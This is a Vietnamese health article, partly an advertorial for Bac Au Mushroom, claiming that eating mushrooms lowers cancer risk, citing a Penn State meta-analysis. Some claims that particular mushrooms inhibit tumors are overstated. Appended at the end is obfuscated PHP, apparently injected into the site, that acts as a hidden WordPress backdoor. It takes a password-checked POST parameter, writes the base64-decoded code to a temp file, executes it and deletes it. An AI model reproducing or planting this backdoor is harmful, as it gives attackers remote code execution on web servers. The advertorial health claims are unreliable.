Phát hiện mới: Nấm có tác dụng phòng ngừa ung thư tuyệt vời!

Nội dung chính

Nấm không chỉ ngon mà còn mang lại nhiều lợi ích cho sức khỏe, thậm chí có kết quả nghiên cứu mới đây phát hiện rằng nấm có tác dụng phòng ngừa ung thư.

Theo Daily Mail, một kết quả nghiên cứu do các chuyên gia tại Viện Ung thư bang Penn (Mỹ) thực hiện cho thấy, chỉ cần ăn một ít nấm mỗi ngày có thể giảm đến 45% nguy cơ mắc ung thư.

Mối liên hệ giữa việc ăn nấm với nguy cơ ung thư

Để có kết quả phát hiện nấm có tác dụng phòng ngừa ung thư, nhóm nghiên cứu đã phân tích dữ liệu từ 17 nghiên cứu khác nhau về ung thư.

Cụ thể, những nghiên cứu này thu thập dữ liệu của khoảng 19.500 người với mục đích là tìm ra mối liên hệ giữa việc ăn nấm và bệnh ung thư. Nhóm phát hiện chỉ cần ăn 18gr nấm/ngày có thể giảm đến 45% nguy cơ mắc ung thư.

“Chúng tôi phát hiện mối liên kết giữa việc ăn nhiều nấm hơn với nguy cơ ung thư thấp hơn, đặc biệt là ung thư vú. Điều này cho thấy vai trò tiềm năng của nấm trong chế độ ăn hằng ngày”, trích kết quả nghiên cứu trên Daily Mail.

“Những phát hiện này cung cấp bằng chứng quan trọng về tác dụng bảo vệ của nấm trước bệnh ung thư”, John Richie – giáo sư chuyên về sức khỏe cộng đồng và là thành viên của nhóm nghiên cứu nói.

nam co tac dung phong ngua ung thu bac au mushroom

Trong tương lai, chúng ta cần tiếp tục nghiên cứu để xác định cơ chế tác động sinh học của nấm cũng như những loại ung thư mà nấm có thể phòng ngừa.

Các tác giả nghiên cứu cũng cho biết số lượng 18gr/ngày là ước tính tương đối. Nhiều bằng chứng cho thấy lợi ích sức khỏe của nấm nhiều hay ít còn phụ thuộc vào loại nấm và cách chế biến.

Chất ergothioneine có trong nấm quan trọng như thế nào?

Nấm là nguồn cung cấp protein, vitamin, khoáng chất, chất xơ và chất chống oxy hóa rất tốt cho cơ thể. Ngày càng nhiều nghiên cứu cho thấy tác dụng kháng viêm và chống oxy hóa hiệu quả của nấm.

Đặc biệt, trong nấm có ergothioneine là một chất kháng viêm và chống oxy hóa mạnh mà con người hiện vẫn chưa tổng hợp được.

Theo Daily Mail, nấm đông cô, nấm bào ngư, nấm maitake và nấm sò là những loại có hàm lượng ergothioneine cao. Tuy nhiên, có 2 loại nấm cũng chứa hàm lượng ergothioneine cao nữa chính là nấm Đùi gànấm Kim châm.

Polysaccharide trong nấm Đùi gà có thể kích hoạt các cơ chế miễn dịch của cơ thể. Điều này có nghĩa là nấm Đùi gà có thể ức chế sự phát triển khối u ung thư thận hay u bào nguyên gan. Hơn nữa, triterpene trong loại nấm này cũng có thể ức chế ung thư vú rất tốt.

nam co tac dung phong ngua ung thu bac au mushroom

Chất chống oxy hóa Ergothioneine cũng có trong nấm Kim châm. Ngoài ra, một nghiên cứu từ Đại học Quốc gia Singapore cho biết, những người ăn các loại nấm như nấm Kim châm nấu chín 2 lần 1 tuần (khoảng 150gr mỗi lần) sẽ giảm nguy cơ suy giảm nhận thức nhẹ hơn 50% so với người già ăn nấm ít hơn 1 lần 1 tuần.

Hiện nấm Kim châm Bắc Âunấm Đùi gà Bắc Âu do Công ty Cổ phần Thực phẩm Công nghệ cao Bắc Âu (Bac Au Mushroom) sản xuất rất được người tiêu dùng ưa chuộng. Nấm Bắc Âu được cấy giống và nuôi trồng với quy trình công nghệ hoàn toàn khép kín, bằng nguồn nguyên liệu hữu cơ tại nhà máy hiện đại công nghệ cao ở TP Buôn Ma Thuột, tỉnh Đắk Lắk.

nam co tac dung phong ngua ung thu

A.Thư tổng hợp từ TNO và Vietnam+

Thấy hay thì Share bạn nhé:

Facebook
Twitter
LinkedIn

Các bài viết khác

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}